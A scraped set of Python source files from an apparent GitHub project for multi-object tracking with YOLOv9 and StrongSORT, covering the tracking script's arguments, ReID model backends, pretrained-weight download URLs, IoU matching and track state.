p, im0, _ = path[i], im0s[i].copy(), dataset.count
p = Path(p) # to Path
s += f'{i}: '
txt_file_name = p.name
save_path = str(save_dir / p.name) + str(i) # im.jpg, vid.mp4, ...
else:
p, im0, _ = path, im0s.copy(), getattr(dataset, 'frame', 0)
p = Path(p) # to Path
# video file
if source.endswith(VID_FORMATS):
txt_file_name = p.stem
save_path = str(save_dir / p.name) # im.jpg, vid.mp4, ...
# folder with imgs
else:
txt_file_name = p.name.split('.')[0] # get folder name containing current img
save_path = str(save_dir / p.name) # im.jpg, vid.mp4, ...
curr_frames[i] = im0
txt_path = str(save_dir / 'tracks' / txt_file_name) # im.txt
s += '%gx%g ' % im.shape[2:] # print string
imc = im0.copy() if save_crop else im0 # for save_crop
if cfg.STRONGSORT.ECC: # camera motion compensation
strongsort_list[i].tracker.camera_update(prev_frames[i], curr_frames[i])
if det is not None and len(det):
# Rescale boxes from img_size to im0 size
# det[:, :4] = scale_coords(im.shape[2:], det[:, :4], im0.shape).round()
# Print results
# for c in det[:, -1].unique():
# n = (det[:, -1] == c).sum() # detections per class
# s += f"{n} {names[int(c)]}{'s' * (n > 1)}, " # add to string
xywhs = det.boxes.xywh
confs = det.boxes.conf
clss = det.boxes.cls
# pass detections to strongsort
t4 = time_sync()
outputs[i] = strongsort_list[i].update(xywhs.cpu(), confs.cpu(), clss.cpu(), im0)
t5 = time_sync()
dt[3] += t5 - t4
# draw boxes for visualization
if len(outputs[i]) > 0:
for j, (output, conf) in enumerate(zip(outputs[i], confs)):
bboxes = output[0:4]
id = output[4]
cls = output[5]
# if save_txt:
# bbox_left = output[0]
# bbox_top = output[1]
# bbox_w = output[2] - output[0]
# bbox_h = output[3] - output[1]
# # Append index to differentiate text files for multiple videos
# txt_path = str(save_dir / 'tracks' / (txt_file_name + f'_{frame_idx}.txt'))
# with open(txt_path, 'a') as file:
# file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
# # Save results (image with detections)
# if save_vid:
# if vid_path[i] != save_path: # new video
# vid_path[i] = save_path
# if isinstance(vid_writer[i], cv2.VideoWriter):
# vid_writer[i].release() # release previous video writer
# if vid_cap: # video
# fps = vid_cap.get(cv2.CAP_PROP_FPS)
# w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))
# h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
# else: # stream
# fps, w, h = 30, im0.shape[1], im0.shape[0]
# save_path = str(Path(save_path).with_suffix('.mp4')) # force *.mp4 suffix on results videos
# vid_writer[i] = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))
# vid_writer[i].write(im0)
if save_txt:
# Append index to differentiate text files for multiple videos
bbox_left = output[0]
bbox_top = output[1]
bbox_w = output[2] - output[0]
bbox_h = output[3] - output[1]
# restart the frame index at 0 for each video
txt_path = str(save_dir / 'tracks' / (txt_file_name + f'_{i}.txt'))
with open(txt_path, 'a') as file:
file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
# if save_txt:
# # to MOT format
# bbox_left = output[0]
# bbox_top = output[1]
# bbox_w = output[2] - output[0]
# bbox_h = output[3] - output[1]
# # format video_name frame id xmin ymin width height score class
# with open(txt_path + '.txt', 'a') as file:
# file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
if save_vid or save_crop or show_vid: # Add bbox to image
c = int(cls) # integer class
id = int(id) # integer id
label = None if hide_labels else (f'{id} {names[c]}' if hide_conf else \
(f'{id} {conf:.2f}' if hide_class else f'{id} {names[c]} {conf:.2f}'))
plot_one_box(bboxes, im0, label=label, color=colors[int(cls)], line_thickness=2)
print(f'{s}Done. YOLO:({t3 - t2:.3f}s), StrongSORT:({t5 - t4:.3f}s)')
else:
strongsort_list[i].increment_ages()
print('No detections')
# Stream results
if show_vid:
cv2.imshow(str(p), im0)
cv2.waitKey(1) # 1 millisecond
# Save results (image with detections)
if save_vid:
if vid_path[i] != save_path: # new video
vid_path[i] = save_path
if isinstance(vid_writer[i], cv2.VideoWriter):
vid_writer[i].release() # release previous video writer
if vid_cap: # video
fps = vid_cap.get(cv2.CAP_PROP_FPS)
w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
else: # stream
fps, w, h = 30, im0.shape[1], im0.shape[0]
save_path = str(Path(save_path).with_suffix('.mp4')) # force *.mp4 suffix on results videos
vid_writer[i] = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))
vid_writer[i].write(im0)
prev_frames[i] = curr_frames[i]
# Print results
t = tuple(x / seen * 1E3 for x in dt) # speeds per image
print(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS, %.1fms strong sort update per image at shape {(1, 3, imgsz, imgsz)}' % t)
if save_txt or save_vid:
s = f"\n{len(list(save_dir.glob('tracks/*.txt')))} tracks saved to {save_dir / 'tracks'}" if save_txt else ''
print(f"Results saved to {colorstr('bold', save_dir)}{s}")
if update:
strip_optimizer(yolo_weights) # update model (to fix SourceChangeWarning)
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--yolo-weights', nargs='+', type=str, default=WEIGHTS / 'yolov7.pt', help='model.pt path(s)')
parser.add_argument('--strong-sort-weights', type=str, default=WEIGHTS / 'osnet_x0_25_msmt17.pt')
parser.add_argument('--config-strongsort', type=str, default='strong_sort/configs/strong_sort.yaml')
parser.add_argument('--source', type=str, default='0', help='file/dir/URL/glob, 0 for webcam')
parser.add_argument('--imgsz', '--img', '--img-size', nargs='+', type=int, default=[640], help='inference size h,w')
parser.add_argument('--conf-thres', type=float, default=0.5, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.5, help='NMS IoU threshold')
parser.add_argument('--max-det', type=int, default=1000, help='maximum detections per image')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--show-vid', action='store_true', help='display tracking video results')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-crop', action='store_true', help='save cropped prediction boxes')
parser.add_argument('--save-vid', action='store_true', help='save video tracking results')
parser.add_argument('--nosave', action='store_true', help='do not save images/videos')
    # class 0 is person, 1 is bicycle, 2 is car... 79 is oven
parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --classes 0, or --classes 0 2 3')
parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--visualize', action='store_true', help='visualize features')
parser.add_argument('--update', action='store_true', help='update all models')
parser.add_argument('--project', default=ROOT / 'runs/track', help='save results to project/name')
parser.add_argument('--name', default='exp', help='save results to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--line-thickness', default=3, type=int, help='bounding box thickness (pixels)')
parser.add_argument('--hide-labels', default=False, action='store_true', help='hide labels')
parser.add_argument('--hide-conf', default=False, action='store_true', help='hide confidences')
parser.add_argument('--hide-class', default=False, action='store_true', help='hide IDs')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference')
opt = parser.parse_args()
opt.imgsz *= 2 if len(opt.imgsz) == 1 else 1 # expand
return opt
def main(opt):
check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop'))
run(**vars(opt))
if __name__ == "__main__":
opt = parse_opt()
main(opt)
| 21,620 | Python | .py | 387 | 44.687339 | 154 | 0.572851 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,109 | reid_multibackend.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/reid_multibackend.py | import torch.nn as nn
import torch
from pathlib import Path
import numpy as np
import torchvision.transforms as transforms
import cv2
import pandas as pd
import gdown
from os.path import exists as file_exists
from .deep.reid_model_factory import show_downloadeable_models, get_model_url, get_model_name
from torchreid.reid.utils import FeatureExtractor
from torchreid.reid.utils.tools import download_url
def check_suffix(file='yolov5s.pt', suffix=('.pt',), msg=''):
# Check file(s) for acceptable suffix
if file and suffix:
if isinstance(suffix, str):
suffix = [suffix]
for f in file if isinstance(file, (list, tuple)) else [file]:
s = Path(f).suffix.lower() # file suffix
if len(s):
assert s in suffix, f"{msg}{f} acceptable suffix is {suffix}"
class ReIDDetectMultiBackend(nn.Module):
# ReID models MultiBackend class for python inference on various backends
def __init__(self, weights='osnet_x0_25_msmt17.pt', device=torch.device('cpu'), fp16=False):
super().__init__()
w = str(weights[0] if isinstance(weights, list) else weights)
self.pt, self.jit, self.onnx, self.xml, self.engine, self.coreml, \
self.saved_model, self.pb, self.tflite, self.edgetpu, self.tfjs = self.model_type(w) # get backend
if self.pt: # PyTorch
model_name = get_model_name(weights)
model_url = get_model_url(weights)
if not file_exists(weights) and model_url is not None:
gdown.download(model_url, str(weights), quiet=False)
elif file_exists(weights):
pass
elif model_url is None:
print('No URL associated to the chosen DeepSort weights. Choose between:')
show_downloadeable_models()
exit()
self.extractor = FeatureExtractor(
# get rid of dataset information DeepSort model name
model_name=model_name,
model_path=weights,
device=str(device)
)
self.extractor.model.half() if fp16 else self.extractor.model.float()
elif self.onnx: # ONNX Runtime
# LOGGER.info(f'Loading {w} for ONNX Runtime inference...')
cuda = torch.cuda.is_available()
#check_requirements(('onnx', 'onnxruntime-gpu' if cuda else 'onnxruntime'))
import onnxruntime
providers = ['CUDAExecutionProvider', 'CPUExecutionProvider'] if cuda else ['CPUExecutionProvider']
self.session = onnxruntime.InferenceSession(w, providers=providers)
elif self.tflite:
try: # https://coral.ai/docs/edgetpu/tflite-python/#update-existing-tf-lite-code-for-the-edge-tpu
from tflite_runtime.interpreter import Interpreter, load_delegate
except ImportError:
import tensorflow as tf
                Interpreter, load_delegate = tf.lite.Interpreter, tf.lite.experimental.load_delegate
            self.interpreter = Interpreter(model_path=weights)
self.interpreter.allocate_tensors()
# Get input and output tensors.
self.input_details = self.interpreter.get_input_details()
self.output_details = self.interpreter.get_output_details()
# Test model on random input data.
input_data = np.array(np.random.random_sample((1,256,128,3)), dtype=np.float32)
self.interpreter.set_tensor(self.input_details[0]['index'], input_data)
self.interpreter.invoke()
# The function `get_tensor()` returns a copy of the tensor data.
output_data = self.interpreter.get_tensor(self.output_details[0]['index'])
print(output_data.shape)
else:
print('This model framework is not supported yet!')
exit()
pixel_mean=[0.485, 0.456, 0.406]
pixel_std=[0.229, 0.224, 0.225]
self.norm = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(pixel_mean, pixel_std),
])
self.size = (256, 128)
self.fp16 = fp16
self.device = device
def export_formats(self):
# YOLOv5 export formats
x = [
['PyTorch', '-', '.pt', True, True],
['TorchScript', 'torchscript', '.torchscript', True, True],
['ONNX', 'onnx', '.onnx', True, True],
['OpenVINO', 'openvino', '_openvino_model', True, False],
['TensorRT', 'engine', '.engine', False, True],
['CoreML', 'coreml', '.mlmodel', True, False],
['TensorFlow SavedModel', 'saved_model', '_saved_model', True, True],
['TensorFlow GraphDef', 'pb', '.pb', True, True],
['TensorFlow Lite', 'tflite', '.tflite', True, False],
['TensorFlow Edge TPU', 'edgetpu', '_edgetpu.tflite', False, False],
['TensorFlow.js', 'tfjs', '_web_model', False, False],]
return pd.DataFrame(x, columns=['Format', 'Argument', 'Suffix', 'CPU', 'GPU'])
def model_type(self, p='path/to/model.pt'):
# Return model type from model path, i.e. path='path/to/model.onnx' -> type=onnx
suffixes = list(self.export_formats().Suffix) + ['.xml'] # export suffixes
check_suffix(p, suffixes) # checks
p = Path(p).name # eliminate trailing separators
pt, jit, onnx, xml, engine, coreml, saved_model, pb, tflite, edgetpu, tfjs, xml2 = (s in p for s in suffixes)
xml |= xml2 # *_openvino_model or *.xml
tflite &= not edgetpu # *.tflite
return pt, jit, onnx, xml, engine, coreml, saved_model, pb, tflite, edgetpu, tfjs
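    # e.g. model_type('osnet_x0_25_msmt17.pt') returns pt=True with every other flag False.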
def warmup(self, imgsz=(1, 256, 128, 3)):
# Warmup model by running inference once
warmup_types = self.pt, self.jit, self.onnx, self.engine, self.saved_model, self.pb
if any(warmup_types) and self.device.type != 'cpu':
im = torch.zeros(*imgsz, dtype=torch.half if self.fp16 else torch.float, device=self.device) # input
im = im.cpu().numpy()
print(im.shape)
for _ in range(2 if self.jit else 1): #
self.forward(im) # warmup
def preprocess(self, im_crops):
def _resize(im, size):
return cv2.resize(im.astype(np.float32), size)
im = torch.cat([self.norm(_resize(im, self.size)).unsqueeze(0) for im in im_crops], dim=0).float()
im = im.float().to(device=self.device)
return im
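        # Crops are resized to self.size, converted to CHW float tensors, normalized with the ImageNet
        # statistics above and stacked into a single batch for the ReID backbone.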
def forward(self, im_batch):
im_batch = self.preprocess(im_batch)
b, ch, h, w = im_batch.shape # batch, channel, height, width
features = []
for i in range(0, im_batch.shape[0]):
im = im_batch[i, :, :, :].unsqueeze(0)
if self.fp16 and im.dtype != torch.float16:
im = im.half() # to FP16
if self.pt: # PyTorch
y = self.extractor.model(im)[0]
elif self.jit: # TorchScript
y = self.model(im)[0]
elif self.onnx: # ONNX Runtime
                im = im.permute(0, 1, 3, 2).cpu().numpy()  # torch to numpy
y = self.session.run([self.session.get_outputs()[0].name], {self.session.get_inputs()[0].name: im})[0]
elif self.xml: # OpenVINO
im = im.cpu().numpy() # FP32
y = self.executable_network([im])[self.output_layer]
else: # TensorFlow (SavedModel, GraphDef, Lite, Edge TPU)
im = im.permute(0, 3, 2, 1).cpu().numpy() # torch BCHW to numpy BHWC shape(1,320,192,3)
input, output = self.input_details[0], self.output_details[0]
int8 = input['dtype'] == np.uint8 # is TFLite quantized uint8 model
if int8:
scale, zero_point = input['quantization']
im = (im / scale + zero_point).astype(np.uint8) # de-scale
self.interpreter.set_tensor(input['index'], im)
self.interpreter.invoke()
                y = self.interpreter.get_tensor(output['index'])  # ndarray; converted to a tensor below
if int8:
scale, zero_point = output['quantization']
y = (y.astype(np.float32) - zero_point) * scale # re-scale
if isinstance(y, np.ndarray):
y = torch.tensor(y, device=self.device)
features.append(y.squeeze())
return features | 8,599 | Python | .py | 157 | 42.592357 | 118 | 0.59265 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,110 | __init__.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/__init__.py | from .strong_sort import StrongSORT
import torch
__all__ = ['StrongSORT', 'build_tracker']
def build_tracker(cfg, use_cuda):
    # StrongSORT (see strong_sort.py) no longer accepts min_confidence, nms_max_overlap or use_cuda,
    # so map the config onto its current signature; fp16 is left disabled here by assumption.
    device = torch.device('cuda') if use_cuda and torch.cuda.is_available() else torch.device('cpu')
    return StrongSORT(cfg.STRONGSORT.REID_CKPT, device, fp16=False,
                      max_dist=cfg.STRONGSORT.MAX_DIST, max_iou_distance=cfg.STRONGSORT.MAX_IOU_DISTANCE,
                      max_age=cfg.STRONGSORT.MAX_AGE, n_init=cfg.STRONGSORT.N_INIT, nn_budget=cfg.STRONGSORT.NN_BUDGET)
| 510 | Python | .py | 7 | 63.428571 | 132 | 0.709419 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,111 | strong_sort.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/strong_sort.py | import numpy as np
import torch
import sys
import cv2
import gdown
from os.path import exists as file_exists, join
import torchvision.transforms as transforms
from .sort.nn_matching import NearestNeighborDistanceMetric
from .sort.detection import Detection
from .sort.tracker import Tracker
# from .deep.reid_model_factory import show_downloadeable_models, get_model_url, get_model_name
from torchreid.reid.utils import FeatureExtractor
from torchreid.reid.utils.tools import download_url
from .reid_multibackend import ReIDDetectMultiBackend
__all__ = ['StrongSORT']
class StrongSORT(object):
def __init__(self,
model_weights,
device,
fp16,
max_dist=0.2,
max_iou_distance=0.7,
max_age=70, n_init=3,
nn_budget=100,
mc_lambda=0.995,
ema_alpha=0.9
):
self.model = ReIDDetectMultiBackend(weights=model_weights, device=device, fp16=fp16)
self.max_dist = max_dist
metric = NearestNeighborDistanceMetric(
"cosine", self.max_dist, nn_budget)
self.tracker = Tracker(
metric, max_iou_distance=max_iou_distance, max_age=max_age, n_init=n_init)
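    # update() takes centre-format (x_c, y_c, w, h) boxes with per-detection confidences and class ids,
    # runs the predict/update cycle, and returns one row per confirmed track that was updated this frame:
    # [x1, y1, x2, y2, track_id, class_id, conf] in pixel coordinates.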
def update(self, bbox_xywh, confidences, classes, ori_img):
self.height, self.width = ori_img.shape[:2]
# generate detections
features = self._get_features(bbox_xywh, ori_img)
bbox_tlwh = self._xywh_to_tlwh(bbox_xywh)
detections = [Detection(bbox_tlwh[i], conf, features[i]) for i, conf in enumerate(
confidences)]
        # gather detection boxes and scores (no additional non-maximum suppression is applied here)
boxes = np.array([d.tlwh for d in detections])
scores = np.array([d.confidence for d in detections])
# update tracker
self.tracker.predict()
self.tracker.update(detections, classes, confidences)
# output bbox identities
outputs = []
for track in self.tracker.tracks:
if not track.is_confirmed() or track.time_since_update > 1:
continue
box = track.to_tlwh()
x1, y1, x2, y2 = self._tlwh_to_xyxy(box)
track_id = track.track_id
class_id = track.class_id
conf = track.conf
outputs.append(np.array([x1, y1, x2, y2, track_id, class_id, conf]))
if len(outputs) > 0:
outputs = np.stack(outputs, axis=0)
return outputs
"""
TODO:
Convert bbox from xc_yc_w_h to xtl_ytl_w_h
Thanks [email protected] for reporting this bug!
"""
@staticmethod
def _xywh_to_tlwh(bbox_xywh):
if isinstance(bbox_xywh, np.ndarray):
bbox_tlwh = bbox_xywh.copy()
elif isinstance(bbox_xywh, torch.Tensor):
bbox_tlwh = bbox_xywh.clone()
bbox_tlwh[:, 0] = bbox_xywh[:, 0] - bbox_xywh[:, 2] / 2.
bbox_tlwh[:, 1] = bbox_xywh[:, 1] - bbox_xywh[:, 3] / 2.
return bbox_tlwh
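    # e.g. a centre-format box [100., 100., 40., 20.] becomes the top-left-format box [80., 90., 40., 20.]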
def _xywh_to_xyxy(self, bbox_xywh):
x, y, w, h = bbox_xywh
x1 = max(int(x - w / 2), 0)
x2 = min(int(x + w / 2), self.width - 1)
y1 = max(int(y - h / 2), 0)
y2 = min(int(y + h / 2), self.height - 1)
return x1, y1, x2, y2
def _tlwh_to_xyxy(self, bbox_tlwh):
"""
        Convert bbox from xtl_ytl_w_h to xmin_ymin_xmax_ymax
        Thanks [email protected] for reporting this bug!
        """
x, y, w, h = bbox_tlwh
x1 = max(int(x), 0)
x2 = min(int(x+w), self.width - 1)
y1 = max(int(y), 0)
y2 = min(int(y+h), self.height - 1)
return x1, y1, x2, y2
def increment_ages(self):
self.tracker.increment_ages()
def _xyxy_to_tlwh(self, bbox_xyxy):
x1, y1, x2, y2 = bbox_xyxy
t = x1
l = y1
w = int(x2 - x1)
h = int(y2 - y1)
return t, l, w, h
def _get_features(self, bbox_xywh, ori_img):
im_crops = []
for box in bbox_xywh:
x1, y1, x2, y2 = self._xywh_to_xyxy(box)
im = ori_img[y1:y2, x1:x2]
im_crops.append(im)
if im_crops:
features = self.model(im_crops)
else:
features = np.array([])
return features
| 4,333 | Python | .py | 113 | 28.911504 | 95 | 0.577191 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,112 | reid_model_factory.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/deep/reid_model_factory.py | __model_types = [
'resnet50', 'mlfn', 'hacnn', 'mobilenetv2_x1_0', 'mobilenetv2_x1_4',
'osnet_x1_0', 'osnet_x0_75', 'osnet_x0_5', 'osnet_x0_25',
'osnet_ibn_x1_0', 'osnet_ain_x1_0']
__trained_urls = {
# market1501 models ########################################################
'resnet50_market1501.pt':
'https://drive.google.com/uc?id=1dUUZ4rHDWohmsQXCRe2C_HbYkzz94iBV',
'resnet50_dukemtmcreid.pt':
'https://drive.google.com/uc?id=17ymnLglnc64NRvGOitY3BqMRS9UWd1wg',
'resnet50_msmt17.pt':
'https://drive.google.com/uc?id=1ep7RypVDOthCRIAqDnn4_N-UhkkFHJsj',
'resnet50_fc512_market1501.pt':
'https://drive.google.com/uc?id=1kv8l5laX_YCdIGVCetjlNdzKIA3NvsSt',
'resnet50_fc512_dukemtmcreid.pt':
'https://drive.google.com/uc?id=13QN8Mp3XH81GK4BPGXobKHKyTGH50Rtx',
'resnet50_fc512_msmt17.pt':
'https://drive.google.com/uc?id=1fDJLcz4O5wxNSUvImIIjoaIF9u1Rwaud',
'mlfn_market1501.pt':
'https://drive.google.com/uc?id=1wXcvhA_b1kpDfrt9s2Pma-MHxtj9pmvS',
'mlfn_dukemtmcreid.pt':
'https://drive.google.com/uc?id=1rExgrTNb0VCIcOnXfMsbwSUW1h2L1Bum',
'mlfn_msmt17.pt':
'https://drive.google.com/uc?id=18JzsZlJb3Wm7irCbZbZ07TN4IFKvR6p-',
'hacnn_market1501.pt':
'https://drive.google.com/uc?id=1LRKIQduThwGxMDQMiVkTScBwR7WidmYF',
'hacnn_dukemtmcreid.pt':
'https://drive.google.com/uc?id=1zNm6tP4ozFUCUQ7Sv1Z98EAJWXJEhtYH',
'hacnn_msmt17.pt':
'https://drive.google.com/uc?id=1MsKRtPM5WJ3_Tk2xC0aGOO7pM3VaFDNZ',
'mobilenetv2_x1_0_market1501.pt':
'https://drive.google.com/uc?id=18DgHC2ZJkjekVoqBWszD8_Xiikz-fewp',
'mobilenetv2_x1_0_dukemtmcreid.pt':
'https://drive.google.com/uc?id=1q1WU2FETRJ3BXcpVtfJUuqq4z3psetds',
'mobilenetv2_x1_0_msmt17.pt':
'https://drive.google.com/uc?id=1j50Hv14NOUAg7ZeB3frzfX-WYLi7SrhZ',
'mobilenetv2_x1_4_market1501.pt':
'https://drive.google.com/uc?id=1t6JCqphJG-fwwPVkRLmGGyEBhGOf2GO5',
'mobilenetv2_x1_4_dukemtmcreid.pt':
'https://drive.google.com/uc?id=12uD5FeVqLg9-AFDju2L7SQxjmPb4zpBN',
'mobilenetv2_x1_4_msmt17.pt':
'https://drive.google.com/uc?id=1ZY5P2Zgm-3RbDpbXM0kIBMPvspeNIbXz',
'osnet_x1_0_market1501.pt':
'https://drive.google.com/uc?id=1vduhq5DpN2q1g4fYEZfPI17MJeh9qyrA',
'osnet_x1_0_dukemtmcreid.pt':
'https://drive.google.com/uc?id=1QZO_4sNf4hdOKKKzKc-TZU9WW1v6zQbq',
'osnet_x1_0_msmt17.pt':
'https://drive.google.com/uc?id=112EMUfBPYeYg70w-syK6V6Mx8-Qb9Q1M',
'osnet_x0_75_market1501.pt':
'https://drive.google.com/uc?id=1ozRaDSQw_EQ8_93OUmjDbvLXw9TnfPer',
'osnet_x0_75_dukemtmcreid.pt':
'https://drive.google.com/uc?id=1IE3KRaTPp4OUa6PGTFL_d5_KQSJbP0Or',
'osnet_x0_75_msmt17.pt':
'https://drive.google.com/uc?id=1QEGO6WnJ-BmUzVPd3q9NoaO_GsPNlmWc',
'osnet_x0_5_market1501.pt':
'https://drive.google.com/uc?id=1PLB9rgqrUM7blWrg4QlprCuPT7ILYGKT',
'osnet_x0_5_dukemtmcreid.pt':
'https://drive.google.com/uc?id=1KoUVqmiST175hnkALg9XuTi1oYpqcyTu',
'osnet_x0_5_msmt17.pt':
'https://drive.google.com/uc?id=1UT3AxIaDvS2PdxzZmbkLmjtiqq7AIKCv',
'osnet_x0_25_market1501.pt':
'https://drive.google.com/uc?id=1z1UghYvOTtjx7kEoRfmqSMu-z62J6MAj',
'osnet_x0_25_dukemtmcreid.pt':
'https://drive.google.com/uc?id=1eumrtiXT4NOspjyEV4j8cHmlOaaCGk5l',
'osnet_x0_25_msmt17.pt':
'https://drive.google.com/uc?id=1sSwXSUlj4_tHZequ_iZ8w_Jh0VaRQMqF',
    ####### msmt17 models ######################################################
'resnet50_msmt17.pt':
'https://drive.google.com/uc?id=1yiBteqgIZoOeywE8AhGmEQl7FTVwrQmf',
'osnet_x1_0_msmt17.pt':
'https://drive.google.com/uc?id=1IosIFlLiulGIjwW3H8uMRmx3MzPwf86x',
'osnet_x0_75_msmt17.pt':
'https://drive.google.com/uc?id=1fhjSS_7SUGCioIf2SWXaRGPqIY9j7-uw',
'osnet_x0_5_msmt17.pt':
'https://drive.google.com/uc?id=1DHgmb6XV4fwG3n-CnCM0zdL9nMsZ9_RF',
'osnet_x0_25_msmt17.pt':
'https://drive.google.com/uc?id=1Kkx2zW89jq_NETu4u42CFZTMVD5Hwm6e',
'osnet_ibn_x1_0_msmt17.pt':
'https://drive.google.com/uc?id=1q3Sj2ii34NlfxA4LvmHdWO_75NDRmECJ',
'osnet_ain_x1_0_msmt17.pt':
'https://drive.google.com/uc?id=1SigwBE6mPdqiJMqhuIY4aqC7--5CsMal',
}
def show_downloadeable_models():
print('\nAvailable .pt ReID models for automatic download')
print(list(__trained_urls.keys()))
def get_model_url(model):
    model = str(model).rsplit('/', 1)[-1]
    if model in __trained_urls:
        return __trained_urls[model]
    else:
        return None
def is_model_in_model_types(model):
model = str(model).rsplit('/', 1)[-1].split('.')[0]
if model in __model_types:
return True
else:
return False
def get_model_name(model):
model = str(model).rsplit('/', 1)[-1].split('.')[0]
for x in __model_types:
if x in model:
return x
return None
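# Hedged usage sketch (added for illustration; the weight path below is an example only):
if __name__ == '__main__':
    show_downloadeable_models()
    example = 'weights/osnet_x0_25_msmt17.pt'
    print(get_model_name(example))             # -> 'osnet_x0_25'
    print(get_model_url(example) is not None)  # -> True, a Google Drive URL exists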
| 4,862 | Python | .py | 103 | 41.990291 | 80 | 0.696855 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,113 | iou_matching.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/sort/iou_matching.py | # vim: expandtab:ts=4:sw=4
from __future__ import absolute_import
import numpy as np
from . import linear_assignment
def iou(bbox, candidates):
"""Computer intersection over union.
Parameters
----------
bbox : ndarray
A bounding box in format `(top left x, top left y, width, height)`.
candidates : ndarray
A matrix of candidate bounding boxes (one per row) in the same format
as `bbox`.
Returns
-------
ndarray
The intersection over union in [0, 1] between the `bbox` and each
candidate. A higher score means a larger fraction of the `bbox` is
occluded by the candidate.
"""
bbox_tl, bbox_br = bbox[:2], bbox[:2] + bbox[2:]
candidates_tl = candidates[:, :2]
candidates_br = candidates[:, :2] + candidates[:, 2:]
tl = np.c_[np.maximum(bbox_tl[0], candidates_tl[:, 0])[:, np.newaxis],
np.maximum(bbox_tl[1], candidates_tl[:, 1])[:, np.newaxis]]
br = np.c_[np.minimum(bbox_br[0], candidates_br[:, 0])[:, np.newaxis],
np.minimum(bbox_br[1], candidates_br[:, 1])[:, np.newaxis]]
wh = np.maximum(0., br - tl)
area_intersection = wh.prod(axis=1)
area_bbox = bbox[2:].prod()
area_candidates = candidates[:, 2:].prod(axis=1)
return area_intersection / (area_bbox + area_candidates - area_intersection)
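# Worked example (editor's illustration) of the tlwh-based IoU above:
#
#     iou(np.array([0., 0., 10., 10.]),
#         np.array([[5., 5., 10., 10.], [20., 20., 10., 10.]]))
#
# returns approximately [0.143, 0.0]: the first candidate shares a 5x5 patch with
# the query box (25 / (100 + 100 - 25)), the second does not overlap at all.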
def iou_cost(tracks, detections, track_indices=None,
detection_indices=None):
"""An intersection over union distance metric.
Parameters
----------
tracks : List[deep_sort.track.Track]
A list of tracks.
detections : List[deep_sort.detection.Detection]
A list of detections.
track_indices : Optional[List[int]]
A list of indices to tracks that should be matched. Defaults to
all `tracks`.
detection_indices : Optional[List[int]]
A list of indices to detections that should be matched. Defaults
to all `detections`.
Returns
-------
ndarray
Returns a cost matrix of shape
len(track_indices), len(detection_indices) where entry (i, j) is
`1 - iou(tracks[track_indices[i]], detections[detection_indices[j]])`.
"""
if track_indices is None:
track_indices = np.arange(len(tracks))
if detection_indices is None:
detection_indices = np.arange(len(detections))
cost_matrix = np.zeros((len(track_indices), len(detection_indices)))
for row, track_idx in enumerate(track_indices):
if tracks[track_idx].time_since_update > 1:
cost_matrix[row, :] = linear_assignment.INFTY_COST
continue
bbox = tracks[track_idx].to_tlwh()
candidates = np.asarray(
[detections[i].tlwh for i in detection_indices])
cost_matrix[row, :] = 1. - iou(bbox, candidates)
return cost_matrix
| 2,843 | Python | .py | 68 | 34.911765 | 80 | 0.635277 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,114 | track.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/sort/track.py | # vim: expandtab:ts=4:sw=4
import cv2
import numpy as np
from strong_sort.sort.kalman_filter import KalmanFilter
class TrackState:
"""
Enumeration type for the single target track state. Newly created tracks are
classified as `tentative` until enough evidence has been collected. Then,
the track state is changed to `confirmed`. Tracks that are no longer alive
are classified as `deleted` to mark them for removal from the set of active
tracks.
"""
Tentative = 1
Confirmed = 2
Deleted = 3
